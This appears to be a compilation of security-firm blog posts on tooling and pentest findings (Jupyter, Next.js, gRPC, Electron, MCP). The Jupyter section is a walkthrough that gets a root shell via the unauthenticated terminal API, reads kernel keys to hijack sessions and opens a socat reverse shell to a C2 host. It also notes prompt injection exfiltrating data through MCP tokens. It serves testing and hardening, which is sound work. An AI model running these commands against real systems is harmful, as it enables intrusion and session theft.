The tool is more important than the blog post; it does everything automatically for you: https://github.com/Adversis/tailsnitch
A security auditor for Tailscale configurations. Scans your tailnet for misconfigurations, overly permissive access controls, and security best practice violations.
And if you just want the checklist: https://github.com/Adversis/tailsnitch/blob/main/HARDENING_TAILSCALE.md
This is not a vulnerability in Jupyter. This is a code execution feature working as designed. When Jupyter is properly configured with token authentication (the default), this technique wouldn't work. The issue comes about when administrators disable security features and run Jupyter with elevated privileges—a dangerous combination on a shared machine.
For those unfamiliar, Jupyter is the Swiss Army knife of data science—a web-based environment where researchers and analysts write code, visualize data, and document their findings all in one place. It’s code execution as a service, basically.
My first instinct was to check if the Jupyter server was accessible
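A quick unauthenticated request is enough to tell (8888 is Jupyter's default port; /api/status is a standard Jupyter Server endpoint):

```
$ curl -s http://localhost:8888/api/status
```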
It was. The API was responding, and even better—no authentication token required. This meant the server was either running with --NotebookApp.token='' or I was accessing it from a trusted network. Either way, Christmas came early.
Here's where things got a little more interesting. Jupyter's REST API documentation showed a promising endpoint: /api/terminals. Unlike the kernel API (which executes Python code), the terminal API provides actual shell access. And I could create a terminal session fairly easily.
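Creating one is a single POST to the terminals endpoint; the name in the response is what goes into the WebSocket path later:

```
$ curl -s -X POST http://localhost:8888/api/terminals
# -> {"name": "1", ...}
```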
But there’s a catch. Terminals in Jupyter communicate over WebSocket, not HTTP. Traditional tools like curl or nc wouldn't work. I needed something that could speak WebSocket from the command line.
After some research, I discovered websocat—essentially netcat for WebSockets. It's a binary that bridges the gap between command-line tools and WebSocket services. Perfect for situations like this.
With websocat in hand, I could now interact with Jupyter's terminal WebSocket, but it wasn't immediately obvious how to send commands to the terminal. The Jupyter Client documentation on WebSocket protocols provides some details about how messages are passed between kernels and the Jupyter web application, and the Terminado client's WebSocket implementation outlines the format needed to interact with Jupyter's terminals.
So when you connect to a Jupyter terminal via WebSocket, you're not getting a raw shell - you're talking to a protocol handler that expects JSON arrays whose first element names the stream ("stdin", "stdout", "setup", etc.). This lets Jupyter multiplex different data streams (input, output, control messages) over a single WebSocket connection. So sending ["stdin", "command"] is how you talk to Jupyter's terminal WebSocket protocol.
And when you connect, it takes a second to initialize the WebSocket connection and won't immediately accept commands, so the elegant solution is to sleep before sending. Echoing a command like id looks like this (a reconstruction; terminal "1" is the session created above):
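```
$ (sleep 1; echo '["stdin", "id\n"]'; sleep 1) | ./websocat "ws://localhost:8888/terminals/websocket/1"
```

The ["stdout", ...] frames that came back included uid=0(root).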
UID 0? Of course, the Jupyter server was running as root, and the terminal API was giving me a root shell. No sudo required, no privilege escalation needed—just ask nicely and receive.
With root access through the terminal, I could now read Jupyter's runtime files:
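```
# default location for a root-owned server; 'jupyter --runtime-dir' confirms it
$ ls /root/.local/share/jupyter/runtime/
# kernel-*.json  (connection files, one per running kernel)
```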
These kernel connection files contain the ZeroMQ ports and the HMAC signing key for each running kernel. A typical kernel-*.json looks like this (values illustrative):
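```
{
  "shell_port": 53794,
  "iopub_port": 53795,
  "stdin_port": 53796,
  "control_port": 53797,
  "hb_port": 53798,
  "ip": "127.0.0.1",
  "key": "8c2b6a3f-...",
  "transport": "tcp",
  "signature_scheme": "hmac-sha256",
  "kernel_name": ""
}
```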
With these, I could connect directly to any running notebook kernel and execute code in other users' sessions. Session hijacking for data science.
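Pointing a stock client at one of those files is all it takes (filename hypothetical):

```
$ jupyter console --existing /root/.local/share/jupyter/runtime/kernel-4f2a.json
```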
For easier interaction, I established a proper reverse shell:
$ (sleep 1; echo '["stdin", "socat exec:\"bash -li\",pty,stderr,setsid,sigint,sane tcp:my.c2.server:4444 &\n"]'; sleep 1; echo '["stdin", "exit\n"]') | ./websocat "ws://localhost:8888/terminals/websocket/1"
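On the receiving end, the usual socat pairing gives a fully interactive TTY (listener address matching the my.c2.server:4444 above):

```
$ socat file:$(tty),raw,echo=0 tcp-listen:4444
```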
Now I had a fully interactive root shell, running through Jupyter's own process. To any monitoring system, this might look like legitimate Jupyter activity.
This isn't a vulnerability in Jupyter—it's a deployment anti-pattern.
Together, these misconfigurations (no authentication token, a server running as root) created a perfect storm. Any user with local access could escalate to root through Jupyter's intended functionality.
If you need multi-user Jupyter, use tools designed for it, such as JupyterHub, which gives each user an authenticated, isolated single-user server.
Need GPU access without root? Use capabilities:
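In practice, GPU device nodes are usually gated by group membership rather than Linux capabilities, so one sketch (account and group names are hypothetical and vary by distro and driver) looks like:

```
# let the unprivileged service account reach the GPU device nodes
$ sudo usermod -aG video,render jupyter-svc
# the device files, not root, are what gate access
$ ls -l /dev/dri/ /dev/nvidia* 2>/dev/null
```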
Map out what users actually need.
If users legitimately need shell access, isolate it properly.
Jupyter is great for interactive data science. The terminal API is genuinely useful for package installation and environment debugging. But these same features are ripe for abuse if deployed without proper consideration.
Downloading websocat and echoing commands is fine for janky use, but how about a little client to drop into a shell?
Check out jupyter-shell
Next.js server actions present an interesting challenge during penetration tests. These server-side functions appear in proxy tools as POST requests with hashed identifiers like a9fa42b4c7d1 in the Next-Action header, making it difficult to understand what each request actually does. When applications have productionBrowserSourceMaps enabled, the NextjsServerActionAnalyzer Burp extension bridges that gap by automatically mapping these hashes to their actual function names.
During a typical web application assessment, endpoints usually have descriptive names and methods: GET /api/user/1 clearly indicates its purpose. Next.js server actions work differently. They all POST to the same endpoint, distinguished only by hash values that change with each build. Without tooling, testers must manually track which hash performs which action—a time-consuming process that becomes impractical with larger applications.
The extension's effectiveness stems from understanding how Next.js bundles server actions in production. When productionBrowserSourceMaps is enabled, JavaScript chunks contain mappings between action hashes and their original function names.
The tool simply uses flexible regex patterns to extract these mappings from minified JavaScript.
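As a rough shell approximation of the idea (the extension's patterns are more flexible; this assumes the common minified shape where the readable function name sits in the same createServerReference call as the hash):

```
$ grep -hoE 'createServerReference\)?\("[0-9a-f]{8,}"[^)]{0,120}"[A-Za-z_$][A-Za-z0-9_$]*"' chunks/*.js
```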
The extension automatically scans proxy history for JavaScript chunks, identifies those containing createServerReference calls, and builds a comprehensive mapping of hash IDs to function names.
Rather than simply tracking which hash IDs have been executed, it tracks function names. This is important since the same function might have different hash IDs across builds, but the function name will remain constant.
For example, if deleteUserAccount() has a hash of a9f8e2b4c7d1 in one build and b7e3f9a2d8c5 in another, manual tracking would treat them as different actions. The extension recognizes they're the same function, providing accurate unused-action detection even across multiple application versions.
A useful feature of the extension is its ability to transform discovered but unused actions into testable requests. When you identify an unused action like exportFinancialData(), the extension can automatically build a ready-to-send request for it.
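A generated request looks roughly like this (path, hash, and body are illustrative; arguments travel as a JSON array):

```
POST /dashboard HTTP/1.1
Host: target.example
Next-Action: a9f8e2b4c7d1
Content-Type: text/plain;charset=UTF-8

[]
```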
This removes the tedium of hand-crafting server action requests.
We recently assessed a Next.js application with dozens of server actions. The client had left productionBrowserSourceMaps enabled in their production environment—a common configuration that includes debugging information in JavaScript files. This presented an opportunity to improve our testing methodology.
Using the Burp extension, we mapped every action hash to its function name and surfaced actions the application never triggered during normal use, such as updateUserProfile() and fetchReportData().
The function name mapping transformed our testing approach. Instead of tracking anonymous hashes, we could see that b7e3f9a2 mapped to deleteUserAccount() and c4d8b1e6 mapped to exportUserData(). This clarity helped us create more targeted test cases.
With the recent GitHub MCP vulnerability demonstrating how prompt injection can leverage overprivileged tokens to exfiltrate private repository data, I wanted to share our approach to MCP security through proxying.
The Core Problem: MCP tools often run with full access tokens (GitHub PATs with repo-wide access, AWS creds with AdminAccess, etc.) and no runtime boundaries. It's essentially pre-sandbox JavaScript with filesystem access. A single malicious prompt or compromised server can access everything.
Why Current Auth is Broken:
MCP Snitch: An open source security proxy that implements the mediation layer MCP lacks:
What It Doesn't Solve:
The browser security model took 25 years to evolve from "JavaScript can delete your files" to today's sandboxed processes with granular permissions. MCP needs the same evolution, but the risks are immediate. Until IDEs implement proper sandboxing and MCP gets protocol-level security primitives, proxy-based security is the practical defense.
GitHub: github.com/Adversis/mcp-snitch
We were testing a black-box service for a client with an interesting software platform. They'd provided an SDK with minimal documentation—just enough to show basic usage, but none of the underlying service definitions. The SDK binary was obfuscated, and the gRPC endpoints it connected to had reflection disabled.
After spending too much time piecing together service names from SDK string dumps and network traces, we built grpc-scan to automate what we were doing manually: exploiting how gRPC implementations handle invalid requests to enumerate services without any prior knowledge.
Unlike REST APIs, where you can throw curl at an endpoint and see what sticks, gRPC operates over HTTP/2 using binary Protocol Buffers. Every request needs the fully qualified service and method name, a correctly framed HTTP/2 POST, and a protobuf-encoded message the server can parse.

Miss any of these and you get nothing useful. There's no OPTIONS request, typically little documentation, and no guessing that /api/v1/users might exist. You either have the proto files or you're blind.
Most teams rely on server reflection—a gRPC feature that lets clients query available services. But reflection is usually disabled in production. It’s an information disclosure risk, yet developers rarely provide alternative documentation.
But gRPC implementations have varying error messages, which inadvertently leak service existence through different error codes:
```
# Calling non-existent service
unknown service FakeService

# Calling real service, wrong method
unknown method FakeMethod for service UserService

# Calling real service and method
missing authentication token
```
These distinct responses let us map the attack surface. The tool automates this process, testing thousands of potential service/method combinations based on various naming patterns we've observed.
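You don't even need a gRPC client to see this: a raw HTTP/2 POST carrying an empty gRPC frame (five zero bytes) elicits the error, and because error responses are typically "trailers-only", grpc-status and grpc-message show up in the headers curl prints. Target host and port are illustrative:

```
$ head -c5 /dev/zero > frame.bin   # empty, uncompressed gRPC message frame
$ curl -s --http2-prior-knowledge -D - -o /dev/null \
    -H 'content-type: application/grpc' -H 'te: trailers' \
    --data-binary @frame.bin \
    http://target:50051/FakeService/FakeMethod
```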
The enumeration engine does a few things:
1. Even when reflection is "disabled," servers often still respond to reflection requests with errors that confirm the protocol exists. We use this for fingerprinting.
2. For a base word like "User", we generate likely services
User
UserService
Users
UserAPI
user.User
api.v1.User
com.company.User

Each pattern is tested with common method names: Get, List, Create, Update, Delete, Search, Find, etc. (a stripped-down sketch of the loop appears after this list).
3. Different gRPC implementations return subtly different error codes:
UNIMPLEMENTED vs NOT_FOUND for missing services
INVALID_ARGUMENT vs INTERNAL for malformed requests

4. gRPC's HTTP/2 foundation means we can multiplex hundreds of requests over a single TCP connection. The tool maintains a pool of persistent connections, improving scan speed.
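Tying items 2 and 3 together, a stripped-down version of the loop looks like this (reusing the curl probe and frame.bin from above; grpc-scan does the same thing concurrently over pooled HTTP/2 connections):

```
for svc in User UserService Users UserAPI api.v1.User com.company.User; do
  for m in Get List Create Update Delete Search Find; do
    # trailers-only error responses carry grpc-status in the printed headers
    status=$(curl -s --http2-prior-knowledge -o /dev/null -D - \
        -H 'content-type: application/grpc' -H 'te: trailers' \
        --data-binary @frame.bin "http://target:50051/$svc/$m" \
      | grep -i '^grpc-status')
    echo "$svc/$m -> $status"
  done
done
```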
What do we commonly see in pentests involving gRPC?
Service Sprawl from Migrations
SDK analysis often reveals parallel service implementations, for example:

UserService - The original monolith endpoint
AccountManagementService - New microservice, full auth
UserDataService - Read-only split-off, inconsistent auth
UserProfileService - Another team's implementation

These typically emerge from partial migrations where different teams own different pieces. The older services often bypass newer security controls.
Method Proliferation and Auth Drift
Real services accumulate method variants over time, for example:

GetUser - Original, added auth in v2
GetUserDetails - Different team, no auth check
FetchUserByID - Deprecated but still active
GetUserWithPreferences - Calls GetUser internally, skips auth

So newer methods that compose older ones sometimes bypass security checks the original methods later acquired.
Package Namespace Archaeology
Service discovery reveals organizational history:

com.startup.api.Users - Original service
platform.users.v1.UserAPI - Post-merge standardization attempt
internal.batch.UserBulkService - "Internal only" but on same endpoint

Each namespace generation typically has different security assumptions. Internal services exposed on the same port as public APIs are surprisingly common—developers assume network isolation that doesn't exist.
Knowing UserService/CreateUser exists is only half the battle: crafting a valid User message still requires the proto definition, guesswork, or reverse engineering the SDK's serialization.

Available at https://github.com/Adversis/grpc-scan. Pull requests welcome.
Node.js native addons (.node files) are compiled binaries that let Node.js applications interface with native code written in languages like C, C++, or Objective-C.

Unlike JavaScript files, which are mostly readable (assuming they're not obfuscated and minified), .node files contain machine code and run with the same privileges as the Node.js process that loads them, without the constraints of the JavaScript sandbox. These extensions can directly call system APIs and perform operations that pure JavaScript cannot, like making system calls.
These addons can use Objective-C++ to leverage native macOS APIs directly from Node.js. This allows arbitrary code execution outside the normal sandboxing that would constrain a typical Electron application.
When an Electron application uses a module that contains a compiled .node file, it automatically loads and executes the binary code within it. Many Electron apps use the ASAR (Atom Shell Archive) file format to package the application's source code. ASAR integrity checking is a security feature that checks the file integrity and prevents tampering with files within the ASAR archive. It is disabled by default.
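One way to turn it on is via Electron fuses at package time (fuse names per the Electron docs; the app path is illustrative):

```
$ npx @electron/fuses write --app ./out/MyApp.app \
    EnableEmbeddedAsarIntegrityValidation=on \
    OnlyLoadAppFromAsar=on
```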
When ASAR integrity is enabled, your Electron app will verify the header hash of the ASAR archive on runtime. If no hash is present or if there is a mismatch in the hashes, the app will forcefully terminate.
This prevents files from being modified within the ASAR archive. Note that it appears the integrity check is a string that you can regenerate after modifying files, then find and replace in the executable file as well. See more here.
But many applications load files from outside the verified archive, under app.asar.unpacked, because compiled .node files (native modules) cannot be executed directly from within an ASAR archive.

And so even with the proper security features enabled, a local attacker can modify or replace .node files in the unpacked directory - not so different from DLL hijacking on Windows.
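Before reaching for tooling, a quick manual check on macOS (the app path in the second command is hypothetical):

```
$ find /Applications -path '*app.asar.unpacked*' -name '*.node' 2>/dev/null
# anything here that your user can write to can be swapped for a malicious addon
$ ls -l '/Applications/Example.app/Contents/Resources/app.asar.unpacked/build/Release/addon.node'
```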
We wrote two tools - one to find Electron applications that aren’t hardened against this, and one to simply compile Node.js addons.
An interactive application that visualizes and demonstrates Google's CaMeL (Capabilities for Machine Learning) security approach for defending against prompt injections in LLM agents.
Link to original paper: https://arxiv.org/pdf/2503.18813
All credit to the original researchers:

```
@misc{debenedetti2025defeating,
  title={Defeating Prompt Injections by Design},
  author={Edoardo Debenedetti and Ilia Shumailov and Tianqi Fan and Jamie Hayes and Nicholas Carlini and Daniel Fabian and Christoph Kern and Chongyang Shi and Andreas Terzis and Florian Tramèr},
  year={2025},
  eprint={2503.18813},
  archivePrefix={arXiv},
  primaryClass={cs.CR},
  url={https://arxiv.org/abs/2503.18813}
}
```